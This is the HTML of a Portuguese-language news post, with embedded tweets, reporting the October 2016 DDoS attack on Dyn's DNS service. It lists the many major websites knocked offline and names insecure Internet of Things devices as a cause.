<div class="TweetAuthor" data-scribe="component:author" style="line-height: 0; margin-top: 2px; max-width: 100%; overflow: hidden !important; text-overflow: ellipsis !important; word-wrap: normal !important;">
<a aria-label="Breaking News Feed (nome de tela: pzf)" class="TweetAuthor-link Identity u-linkBlend" data-scribe="element:user_link" href="https://twitter.com/pzf" style="background-color: transparent; font-weight: inherit; line-height: 1.2; outline: 0px; text-decoration: inherit;"><span class="TweetAuthor-avatar Identity-avatar" style="background-color: transparent; border-radius: 4px; display: inline-block; height: 36px; left: 0px; overflow: hidden; position: absolute; top: 0px; width: 36px;"><img alt="" class="Avatar" data-scribe="element:avatar" data-src-1x="https://pbs.twimg.com/profile_images/676529721274945540/1RQ39euJ_normal.jpg" data-src-2x="https://pbs.twimg.com/profile_images/676529721274945540/1RQ39euJ_bigger.jpg" src="https://pbs.twimg.com/profile_images/676529721274945540/1RQ39euJ_normal.jpg" style="border: 0px; max-height: 100%; max-width: 100%;" /></span><span class="TweetAuthor-name Identity-name customisable-highlight" data-scribe="element:name" style="font-weight: 700;" title="Breaking News Feed">Breaking News Feed</span> <span class="TweetAuthor-screenName Identity-screenName" data-scribe="element:screen_name" dir="ltr" style="color: #697882; font-size: 14px;" title="@pzf">@pzf</span></a></div>
</div>
<div class="Tweet-body e-entry-content" data-scribe="component:tweet" style="margin-top: 14px;">
<div class="Tweet-text e-entry-title" dir="ltr" lang="en" style="border: none; cursor: text; direction: ltr; list-style: none; padding: 0px;">
Websites affected by <a class="PrettyLink hashtag customisable" data-query-source="hashtag_click" data-scribe="element:hashtag" dir="ltr" href="https://twitter.com/hashtag/DDoS?src=hash" rel="tag" style="background-color: transparent; color: #2b7bb9; outline: 0px; text-decoration: none;"><span class="PrettyLink-prefix">#</span><span class="PrettyLink-value">DDoS</span></a> :<br />•Twitter<br />•Amazon<br />•CNN<br />•Reddit<br />•Nytimes<br />•PayPal<br />•Spotify<br />•SoundCloud<br />•AirBnB<br />•HBO<br />•Netflix<br />•Etsy<br />•Github<br />•Vox</div>
<div class="Tweet-metadata dateline" style="color: #697882; font-size: 14px; margin-top: 3.2px;">
<a class="u-linkBlend u-url customisable-highlight long-permalink" data-datetime="2016-10-21T20:49:10+0000" data-scribe="element:full_timestamp" href="https://twitter.com/pzf/status/789569238868590592" style="background-color: transparent; font-weight: inherit; outline: 0px; text-decoration: inherit;">18: 49 - 21 out 2016</a></div>
<ul aria-label="Ações do Tweet" class="Tweet-actions" data-scribe="component:actions" role="menu" style="border: none; list-style: none; margin: 8.4px 0px 0px; padding: 0px;">
<li class="Tweet-action" style="display: inline-block;"><a class="TweetAction TweetAction--reply web-intent" data-scribe="element:reply" href="https://twitter.com/intent/tweet?in_reply_to=789569238868590592" style="background-color: transparent; color: #697882; outline: 0px; text-decoration: none;"><div aria-label="Responder" class="Icon Icon--reply TweetAction-icon" role="img" style="background-image: url("data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2062%2072%22%3E%3Cpath%20class%3D%22icon%22%20fill%3D%22%23697882%22%20d%3D%22M41%2031h-9V19c0-1.14-.647-2.183-1.668-2.688-1.022-.507-2.243-.39-3.15.302l-21%2016C5.438%2033.18%205%2034.064%205%2035s.437%201.82%201.182%202.387l21%2016c.533.405%201.174.613%201.82.613.453%200%20.908-.103%201.33-.312C31.354%2053.183%2032%2052.14%2032%2051V39h9c5.514%200%2010%204.486%2010%2010%200%202.21%201.79%204%204%204s4-1.79%204-4c0-9.925-8.075-18-18-18z%22%2F%3E%3C%2Fsvg%3E"); background-repeat: no-repeat; background-size: contain; display: inline-block; height: 1.25em; transform: scaleX(1); vertical-align: text-bottom; width: 1.07639em;" title="Responder">
</div>
</a></li>
<li class="Tweet-action" style="display: inline-block; margin-left: 14px;"><a class="TweetAction TweetAction--retweet web-intent" data-scribe="element:retweet" href="https://twitter.com/intent/retweet?tweet_id=789569238868590592" style="background-color: transparent; color: #697882; outline: 0px; text-decoration: none;"><div aria-label="Retweetar" class="Icon Icon--retweet TweetAction-icon" role="img" style="background-image: url("data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2074%2072%22%3E%3Cpath%20class%3D%22icon%22%20fill%3D%22%23697882%22%20d%3D%22M70.676%2036.644C70.166%2035.636%2069.13%2035%2068%2035h-7V19c0-2.21-1.79-4-4-4H34c-2.21%200-4%201.79-4%204s1.79%204%204%204h18c.552%200%20.998.446%201%20.998V35h-7c-1.13%200-2.165.636-2.676%201.644-.51%201.01-.412%202.22.257%203.13l11%2015C55.148%2055.545%2056.046%2056%2057%2056s1.855-.455%202.42-1.226l11-15c.668-.912.767-2.122.256-3.13zM40%2048H22c-.54%200-.97-.427-.992-.96L21%2036h7c1.13%200%202.166-.636%202.677-1.644.51-1.01.412-2.22-.257-3.13l-11-15C18.854%2015.455%2017.956%2015%2017%2015s-1.854.455-2.42%201.226l-11%2015c-.667.912-.767%202.122-.255%203.13C3.835%2035.365%204.87%2036%206%2036h7l.012%2016.003c.002%202.208%201.792%203.997%204%203.997h22.99c2.208%200%204-1.79%204-4s-1.792-4-4-4z%22%2F%3E%3C%2Fsvg%3E"); background-repeat: no-repeat; background-size: contain; display: inline-block; height: 1.25em; transform: scaleX(1); vertical-align: text-bottom; width: 1.28472em;" title="Retweetar">
</div>
<span aria-hidden="true" class="TweetAction-stat" data-scribe="element:retweet_count" style="display: inline-block; font-size: 14px; vertical-align: text-bottom;">3.735</span><span class="u-hiddenVisually" style="border: 0px !important; clip: rect(1px 1px 1px 1px) !important; height: 1px !important; overflow: hidden !important; padding: 0px !important; position: absolute !important; width: 1px !important;">3.735 Retweets</span></a></li>
<li class="Tweet-action" style="display: inline-block; margin-left: 14px;"><a class="TweetAction TweetAction--heart web-intent" data-scribe="element:heart" href="https://twitter.com/intent/like?tweet_id=789569238868590592" style="background-color: transparent; color: #697882; outline: 0px; text-decoration: none;"><div aria-label="Curtiu" class="Icon Icon--heart TweetAction-icon" role="img" style="background-image: url("data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2054%2072%22%3E%3Cpath%20class%3D%22icon%22%20fill%3D%22%23697882%22%20d%3D%22M38.723%2012c-7.187%200-11.16%207.306-11.723%208.13-.563-.824-4.496-8.13-11.723-8.13C8.79%2012%203.533%2018.163%203.533%2024.647%203.533%2039.964%2021.89%2055.907%2027%2056c5.11-.093%2023.467-16.036%2023.467-31.353C50.467%2018.163%2045.21%2012%2038.723%2012z%22%2F%3E%3C%2Fsvg%3E"); background-repeat: no-repeat; background-size: contain; display: inline-block; height: 1.25em; vertical-align: text-bottom; width: 0.9375em;" title="Curtiu">
</div>
<span aria-hidden="true" class="TweetAction-stat" data-scribe="element:heart_count" style="display: inline-block; font-size: 14px; vertical-align: text-bottom;">2.104</span><span class="u-hiddenVisually" style="border: 0px !important; clip: rect(1px 1px 1px 1px) !important; height: 1px !important; overflow: hidden !important; padding: 0px !important; position: absolute !important; width: 1px !important;">2.104 favoritos</span></a></li>
</ul>
</div>
</blockquote>
</div>
</div>
<div class="resize-sensor" style="bottom: 0px; left: 0px; overflow: hidden; position: absolute; right: 0px; top: 0px; visibility: hidden; z-index: -1;">
<div class="resize-sensor-expand" style="bottom: 0px; left: 0px; overflow: hidden; position: absolute; right: 0px; top: 0px; visibility: hidden; z-index: -1;">
<div style="height: 480px; left: 0px; position: absolute; top: 0px; transition: 0s; width: 510px;">
</div>
</div>
<div class="resize-sensor-shrink" style="bottom: 0px; left: 0px; overflow: hidden; position: absolute; right: 0px; top: 0px; visibility: hidden; z-index: -1;">
<div style="height: 940.344px; left: 0px; position: absolute; top: 0px; transition: 0s; width: 1000px;">
</div>
</div>
</div>
</div>
</twitterwidget></div>
<div align="center" style="box-sizing: border-box;">
<twitterwidget class="twitter-tweet twitter-tweet-rendered" data-tweet-id="789569313959272448" id="twitter-widget-3" style="box-sizing: border-box; display: block; margin-bottom: 10px; margin-top: 10px; max-width: 100%; min-width: 220px; position: static; transform: rotate(0deg); visibility: visible; width: 500px;"><div class="SandboxRoot env-bp-350" data-twitter-event-id="3" style="background: 0px 0px; color: #1c2022; direction: ltr; font-family: Helvetica, Roboto, 'Segoe UI', Calibri, sans-serif; font-stretch: normal; line-height: 1.4; position: relative; text-align: left; white-space: initial;">
<div class="EmbeddedTweet js-clickToOpenTarget" data-click-to-open-target="https://twitter.com/TheAnonnMessage/status/789569313959272448" data-dt-abbr="%{number}%{symbol}" data-dt-am="AM" data-dt-full="%{hours24}: %{minutes} - %{day} %{month} %{year} " data-dt-h="h" data-dt-hour="hora" data-dt-hours="horas" data-dt-long="%{day} %{month} %{year}" data-dt-m="m" data-dt-minute="minuto" data-dt-minutes="minutos" data-dt-months="jan|fev|mar|abr|maio|jun|jul|ago|set|out|nov|dez" data-dt-now="agora" data-dt-pm="PM" data-dt-s="s" data-dt-second="segundo" data-dt-seconds="segundos" data-dt-short="%{day} %{month}" data-iframe-title="Tweet do Twitter" data-scribe="page:tweet" data-twitter-event-id="5" id="twitter-widget-3" lang="pt" style="border-radius: 4px; border: 1px solid rgb(225, 232, 237); cursor: pointer; max-width: 520px; overflow: hidden;">
<div class="EmbeddedTweet-tweet" style="padding: 20px 20px 11.6px;">
<blockquote cite="https://twitter.com/TheAnonnMessage/status/789569313959272448" class="Tweet h-entry js-tweetIdInfo subject expanded
is-deciderHtmlWhitespace" data-scribe="section:subject" data-tweet-id="789569313959272448" style="border: none; list-style: none; margin: 0px; padding: 0px;">
<div class="Tweet-header u-cf" style="padding-left: 45px; position: relative; white-space: nowrap;">
<div class="Tweet-brand u-floatRight" style="float: right !important; position: relative; z-index: 1;">
<span class="u-hiddenInNarrowEnv"><a class="FollowButton follow-button profile" data-scribe="component:followbutton" href="https://twitter.com/TheAnonnMessage" role="button" style="border-radius: 4px; border: 1px solid rgb(85, 172, 238); color: #55acee; display: inline-block; font-size: 14px; font-weight: 700; line-height: 1; outline: 0px; padding: 5.5px 13px 6.5px 11.5px; text-decoration: none;" title="Siga TheAnonMessage no Twitter"><span class="FollowButton-bird" style="display: inline-block; position: relative; top: 1px;"><div aria-label="" class="Icon Icon--twitter " role="presentation" style="background-image: url("data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2072%2072%22%3E%3Cpath%20fill%3D%22none%22%20d%3D%22M0%200h72v72H0z%22%2F%3E%3Cpath%20class%3D%22icon%22%20fill%3D%22%2355acee%22%20d%3D%22M68.812%2015.14c-2.348%201.04-4.87%201.744-7.52%202.06%202.704-1.62%204.78-4.186%205.757-7.243-2.53%201.5-5.33%202.592-8.314%203.176C56.35%2010.59%2052.948%209%2049.182%209c-7.23%200-13.092%205.86-13.092%2013.093%200%201.026.118%202.02.338%202.98C25.543%2024.527%2015.9%2019.318%209.44%2011.396c-1.125%201.936-1.77%204.184-1.77%206.58%200%204.543%202.312%208.552%205.824%2010.9-2.146-.07-4.165-.658-5.93-1.64-.002.056-.002.11-.002.163%200%206.345%204.513%2011.638%2010.504%2012.84-1.1.298-2.256.457-3.45.457-.845%200-1.666-.078-2.464-.23%201.667%205.2%206.5%208.985%2012.23%209.09-4.482%203.51-10.13%205.605-16.26%205.605-1.055%200-2.096-.06-3.122-.184%205.794%203.717%2012.676%205.882%2020.067%205.882%2024.083%200%2037.25-19.95%2037.25-37.25%200-.565-.013-1.133-.038-1.693%202.558-1.847%204.778-4.15%206.532-6.774z%22%2F%3E%3C%2Fsvg%3E"); background-repeat: no-repeat; background-size: contain; display: inline-block; height: 1.25em; vertical-align: text-bottom; width: 1.25em;" title="">
</div>
</span> Seguir</a></span></div>
<div class="TweetAuthor" data-scribe="component:author" style="line-height: 0; margin-top: 2px; max-width: 100%; overflow: hidden !important; text-overflow: ellipsis !important; word-wrap: normal !important;">
<a aria-label="TheAnonMessage (nome de tela: TheAnonnMessage)" class="TweetAuthor-link Identity u-linkBlend" data-scribe="element:user_link" href="https://twitter.com/TheAnonnMessage" style="background-color: transparent; font-weight: inherit; line-height: 1.2; outline: 0px; text-decoration: inherit;"><span class="TweetAuthor-avatar Identity-avatar" style="background-color: transparent; border-radius: 4px; display: inline-block; height: 36px; left: 0px; overflow: hidden; position: absolute; top: 0px; width: 36px;"><img alt="" class="Avatar" data-scribe="element:avatar" data-src-1x="https://pbs.twimg.com/profile_images/708583541391675393/Cr_idmTZ_normal.jpg" data-src-2x="https://pbs.twimg.com/profile_images/708583541391675393/Cr_idmTZ_bigger.jpg" src="https://pbs.twimg.com/profile_images/708583541391675393/Cr_idmTZ_normal.jpg" style="border: 0px; max-height: 100%; max-width: 100%;" /></span><span class="TweetAuthor-name Identity-name customisable-highlight" data-scribe="element:name" style="font-weight: 700;" title="TheAnonMessage">TheAnonMessage</span> <span class="TweetAuthor-screenName Identity-screenName" data-scribe="element:screen_name" dir="ltr" style="color: #697882; font-size: 14px;" title="@TheAnonnMessage">@TheAnonnMessage</span></a></div>
</div>
<div class="Tweet-body e-entry-content" data-scribe="component:tweet" style="margin-top: 14px;">
<div class="Tweet-text e-entry-title" dir="ltr" lang="en" style="border: none; cursor: text; direction: ltr; list-style: none; padding: 0px;">
LIST OF MAJOR AFFECTED NETWORKS:<br />-Twitter<br />-Spotify<br />-PayPal<br />-PSN<br />-Netflix<br />-Amazon<br />-SoundCloud<br />-Reddit<br />-CNN<br />-Vox<a class="PrettyLink hashtag customisable" data-query-source="hashtag_click" data-scribe="element:hashtag" dir="ltr" href="https://twitter.com/hashtag/DDOS?src=hash" rel="tag" style="background-color: transparent; color: #2b7bb9; outline: 0px; text-decoration: none;"><span class="PrettyLink-prefix">#</span><span class="PrettyLink-value">DDOS</span></a> <a class="PrettyLink hashtag customisable" data-query-source="hashtag_click" data-scribe="element:hashtag" dir="ltr" href="https://twitter.com/hashtag/DNSATTACK?src=hash" rel="tag" style="background-color: transparent; color: #2b7bb9; outline: 0px; text-decoration: none;"><span class="PrettyLink-prefix">#</span><span class="PrettyLink-value">DNSATTACK</span></a></div>
<div class="Tweet-metadata dateline" style="color: #697882; font-size: 14px; margin-top: 3.2px;">
<a class="u-linkBlend u-url customisable-highlight long-permalink" data-datetime="2016-10-21T20:49:28+0000" data-scribe="element:full_timestamp" href="https://twitter.com/TheAnonnMessage/status/789569313959272448" style="background-color: transparent; font-weight: inherit; outline: 0px; text-decoration: inherit;">18: 49 - 21 out 2016</a></div>
<ul aria-label="Ações do Tweet" class="Tweet-actions" data-scribe="component:actions" role="menu" style="border: none; list-style: none; margin: 8.4px 0px 0px; padding: 0px;">
<li class="Tweet-action" style="display: inline-block;"><a class="TweetAction TweetAction--reply web-intent" data-scribe="element:reply" href="https://twitter.com/intent/tweet?in_reply_to=789569313959272448" style="background-color: transparent; color: #697882; outline: 0px; text-decoration: none;"><div aria-label="Responder" class="Icon Icon--reply TweetAction-icon" role="img" style="background-image: url("data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2062%2072%22%3E%3Cpath%20class%3D%22icon%22%20fill%3D%22%23697882%22%20d%3D%22M41%2031h-9V19c0-1.14-.647-2.183-1.668-2.688-1.022-.507-2.243-.39-3.15.302l-21%2016C5.438%2033.18%205%2034.064%205%2035s.437%201.82%201.182%202.387l21%2016c.533.405%201.174.613%201.82.613.453%200%20.908-.103%201.33-.312C31.354%2053.183%2032%2052.14%2032%2051V39h9c5.514%200%2010%204.486%2010%2010%200%202.21%201.79%204%204%204s4-1.79%204-4c0-9.925-8.075-18-18-18z%22%2F%3E%3C%2Fsvg%3E"); background-repeat: no-repeat; background-size: contain; display: inline-block; height: 1.25em; transform: scaleX(1); vertical-align: text-bottom; width: 1.07639em;" title="Responder">
</div>
</a></li>
<li class="Tweet-action" style="display: inline-block; margin-left: 14px;"><a class="TweetAction TweetAction--retweet web-intent" data-scribe="element:retweet" href="https://twitter.com/intent/retweet?tweet_id=789569313959272448" style="background-color: transparent; color: #697882; outline: 0px; text-decoration: none;"><div aria-label="Retweetar" class="Icon Icon--retweet TweetAction-icon" role="img" style="background-image: url("data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2074%2072%22%3E%3Cpath%20class%3D%22icon%22%20fill%3D%22%23697882%22%20d%3D%22M70.676%2036.644C70.166%2035.636%2069.13%2035%2068%2035h-7V19c0-2.21-1.79-4-4-4H34c-2.21%200-4%201.79-4%204s1.79%204%204%204h18c.552%200%20.998.446%201%20.998V35h-7c-1.13%200-2.165.636-2.676%201.644-.51%201.01-.412%202.22.257%203.13l11%2015C55.148%2055.545%2056.046%2056%2057%2056s1.855-.455%202.42-1.226l11-15c.668-.912.767-2.122.256-3.13zM40%2048H22c-.54%200-.97-.427-.992-.96L21%2036h7c1.13%200%202.166-.636%202.677-1.644.51-1.01.412-2.22-.257-3.13l-11-15C18.854%2015.455%2017.956%2015%2017%2015s-1.854.455-2.42%201.226l-11%2015c-.667.912-.767%202.122-.255%203.13C3.835%2035.365%204.87%2036%206%2036h7l.012%2016.003c.002%202.208%201.792%203.997%204%203.997h22.99c2.208%200%204-1.79%204-4s-1.792-4-4-4z%22%2F%3E%3C%2Fsvg%3E"); background-repeat: no-repeat; background-size: contain; display: inline-block; height: 1.25em; transform: scaleX(1); vertical-align: text-bottom; width: 1.28472em;" title="Retweetar">
</div>
<span aria-hidden="true" class="TweetAction-stat" data-scribe="element:retweet_count" style="display: inline-block; font-size: 14px; vertical-align: text-bottom;">1.773</span><span class="u-hiddenVisually" style="border: 0px !important; clip: rect(1px 1px 1px 1px) !important; height: 1px !important; overflow: hidden !important; padding: 0px !important; position: absolute !important; width: 1px !important;">1.773 Retweets</span></a></li>
<li class="Tweet-action" style="display: inline-block; margin-left: 14px;"><a class="TweetAction TweetAction--heart web-intent" data-scribe="element:heart" href="https://twitter.com/intent/like?tweet_id=789569313959272448" style="background-color: transparent; color: #697882; outline: 0px; text-decoration: none;"><div aria-label="Curtiu" class="Icon Icon--heart TweetAction-icon" role="img" style="background-image: url("data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%2054%2072%22%3E%3Cpath%20class%3D%22icon%22%20fill%3D%22%23697882%22%20d%3D%22M38.723%2012c-7.187%200-11.16%207.306-11.723%208.13-.563-.824-4.496-8.13-11.723-8.13C8.79%2012%203.533%2018.163%203.533%2024.647%203.533%2039.964%2021.89%2055.907%2027%2056c5.11-.093%2023.467-16.036%2023.467-31.353C50.467%2018.163%2045.21%2012%2038.723%2012z%22%2F%3E%3C%2Fsvg%3E"); background-repeat: no-repeat; background-size: contain; display: inline-block; height: 1.25em; vertical-align: text-bottom; width: 0.9375em;" title="Curtiu">
</div>
<span aria-hidden="true" class="TweetAction-stat" data-scribe="element:heart_count" style="display: inline-block; font-size: 14px; vertical-align: text-bottom;">1.328</span><span class="u-hiddenVisually" style="border: 0px !important; clip: rect(1px 1px 1px 1px) !important; height: 1px !important; overflow: hidden !important; padding: 0px !important; position: absolute !important; width: 1px !important;">1.328 favoritos</span></a></li>
</ul>
</div>
</blockquote>
</div>
</div>
<div class="resize-sensor" style="bottom: 0px; left: 0px; overflow: hidden; position: absolute; right: 0px; top: 0px; visibility: hidden; z-index: -1;">
<div class="resize-sensor-expand" style="bottom: 0px; left: 0px; overflow: hidden; position: absolute; right: 0px; top: 0px; visibility: hidden; z-index: -1;">
<div style="height: 392px; left: 0px; position: absolute; top: 0px; transition: 0s; width: 510px;">
</div>
</div>
<div class="resize-sensor-shrink" style="bottom: 0px; left: 0px; overflow: hidden; position: absolute; right: 0px; top: 0px; visibility: hidden; z-index: -1;">
<div style="height: 764.344px; left: 0px; position: absolute; top: 0px; transition: 0s; width: 1000px;">
</div>
</div>
</div>
</div>
</twitterwidget></div>
<div style="box-sizing: border-box; margin-top: 26px;">
<span class="img-fc" style="box-sizing: border-box; clear: both; display: block; margin-bottom: 52px; margin-top: 52px; text-align: center;"><img src="http://img2.ibxk.com.br/2016/10/21/21190126112857.jpg?w=700" style="border: 0px; box-sizing: border-box; display: block; height: auto; margin-left: auto !important; margin-right: auto !important; max-width: 100%; vertical-align: middle;" /><span class="desc" style="box-sizing: border-box; display: block; font-style: italic; margin-top: 26px;">Nossos leitores também estão sentindo os efeitos</span></span></div>
<div style="box-sizing: border-box; margin-top: 26px;">
<span class="img-fc" style="box-sizing: border-box; clear: both; display: block; margin-bottom: 52px; margin-top: 52px; text-align: center;"><img src="http://img3.ibxk.com.br/2016/10/21/21190420893858.jpg?w=700" style="border: 0px; box-sizing: border-box; display: block; height: auto; margin-left: auto !important; margin-right: auto !important; max-width: 100%; vertical-align: middle;" /><span class="desc" style="box-sizing: border-box; display: block; font-style: italic; margin-top: 26px;">PSN fora do ar</span></span></div>
<h2 style="box-sizing: border-box; color: black; font-size: 28px; line-height: 52px; margin: 52px 0px 0px;">
Outros sites caindo</h2>
<div style="box-sizing: border-box; margin-top: 26px;">
Além dos sites citados, outros serviços começam a cair, como a Netflix, o PayPal e a Amazon. Se você está preocupado, por enquanto, fique tranquilo: ataques DDoS não roubam dados, apenas derrubam o servidor. Nenhum grupo assumiu a autoria dos ataques até o momento, que geram dois fatores negativos para as empresas afetadas: dinheiro perdido e reputação arranhada.</div>
<div style="box-sizing: border-box; margin-top: 26px;">
Os ataques hackers estão ficando cada vez mais refinados. Além de novas técnicas e tecnologias, mais pessoas vêm participando dos ataques — e os crackers também estão pegando mais dinheiro; para saber mais sobre, você pode <a href="http://www.tecmundo.com.br/crime-virtual/106679-brasil-caotico-cibercrime-entrevistamos-misha-glenny.htm" style="border-bottom-color: transparent; border-bottom-style: solid; border-bottom-width: 2px; box-sizing: border-box; color: #0099ff; font-weight: 700; outline: 0px; text-decoration: none; transition: border-color 0.1s, color 0.1s;" target="_blank">ler esta</a> ou <a href="http://www.tecmundo.com.br/crime-virtual/109769-jogue-fora-smartphone-diz-john-mcafee-tecmundo.htm?utm_source=tecmundo.com.br&utm_medium=home&utm_campaign=tv" style="border-bottom-color: transparent; border-bottom-style: solid; border-bottom-width: 2px; box-sizing: border-box; color: #0099ff; font-weight: 700; outline: 0px; text-decoration: none; transition: border-color 0.1s, color 0.1s;" target="_blank">esta entrevista</a>, com Misha Glenny e McAfee, respectivamente.</div>
<div class="uk-text-center" style="box-sizing: border-box; margin-top: 26px; text-align: center;">
<span class="nzn-article-eye" style="box-sizing: border-box; color: #0099ff; display: block; font-size: 28px; font-style: italic; line-height: 38px; margin-bottom: 52px; margin-top: 52px;">A Internet das Coisas tem uma grande culpa</span></div>
<div style="box-sizing: border-box; margin-top: 26px;">
Com a Internet das Coisas cada vez mais presente, é bom começarmos a trabalhar mais em segurança e privacidade. E tenha certeza: a IoT tem "grande culpa" nos ataques de hoje.</div>
<div style="box-sizing: border-box; margin-top: 26px;">
Abaixo, você pode ver uma lista com todos os sites afetados:</div>
<ul style="box-sizing: border-box; list-style-position: inside; margin-bottom: 0px; margin-top: 26px; padding-left: 0px;">
<li style="box-sizing: border-box;">ActBlue</li>
<li style="box-sizing: border-box;">Basecamp</li>
<li style="box-sizing: border-box;">Big cartel</li>
<li style="box-sizing: border-box;">Box</li>
<li style="box-sizing: border-box;">Business Insider</li>
<li style="box-sizing: border-box;">CNN</li>
<li style="box-sizing: border-box;">Cleveland.com</li>
<li style="box-sizing: border-box;">Esty</li>
<li style="box-sizing: border-box;">Github</li>
<li style="box-sizing: border-box;">Grubhub</li>
<li style="box-sizing: border-box;">Guardian.co.uk</li>
<li style="box-sizing: border-box;">HBO Now</li>
<li style="box-sizing: border-box;">Iheart.com (iHeartRadio)</li>
<li style="box-sizing: border-box;">Imgur</li>
<li style="box-sizing: border-box;">Intercom</li>
<li style="box-sizing: border-box;">Intercom.com</li>
<li style="box-sizing: border-box;">Okta</li>
<li style="box-sizing: border-box;">PayPal</li>
<li style="box-sizing: border-box;">People.com</li>
<li style="box-sizing: border-box;">Pinterest</li>
<li style="box-sizing: border-box;">Playstation Network</li>
<li style="box-sizing: border-box;">Recode</li>
<li style="box-sizing: border-box;">Reddit</li>
<li style="box-sizing: border-box;">Spotify</li>
<li style="box-sizing: border-box;">Squarespace Customer Sites</li>
<li style="box-sizing: border-box;">Starbucks rewards/gift cards</li>
<li style="box-sizing: border-box;">Storify.com</li>
<li style="box-sizing: border-box;">The Verge</li>
<li style="box-sizing: border-box;">Twillo</li>
<li style="box-sizing: border-box;">Twitter</li>
<li style="box-sizing: border-box;">Urbandictionary.com (lol)</li>
<li style="box-sizing: border-box;">Weebly</li>
<li style="box-sizing: border-box;">Wired.com</li>
<li style="box-sizing: border-box;">Wix Customer Sites</li>
<li style="box-sizing: border-box;">Yammer</li>
<li style="box-sizing: border-box;">Yelp</li>
<li style="box-sizing: border-box;">Zendesk.com</li>
<li style="box-sizing: border-box;">Zoho CRM</li>
</ul>
</div>
<div class="references" style="background-color: white; box-sizing: border-box; color: #333333; font-family: Lato, Helvetica, Arial, sans-serif; font-size: 12px; font-weight: 700; line-height: 20px; margin-top: 52px; text-transform: uppercase;">
<span class="references-title" style="box-sizing: border-box; color: black; display: inline-block; margin-right: 20px;">FONTE(S)</span><ul class="references-list" style="box-sizing: border-box; display: inline; list-style: none; margin: 0px; padding: 0px;">
<li class="references-item" style="box-sizing: border-box; color: #999999; display: inline-block; margin-right: 20px;"><a href="https://www.dynstatus.com/incidents/nlr4yrr162t8" style="border-bottom-color: transparent; border-bottom-style: solid; border-bottom-width: 2px; box-sizing: border-box; color: #0099ff; outline: 0px; text-decoration: none; transition: border-color 0.1s, color 0.1s;" target="_blank" title="Dyn">DYN</a></li>
</ul>
</div>
</div>
mrdrawerhttp://www.blogger.com/profile/08233472049860500738noreply@blogger.com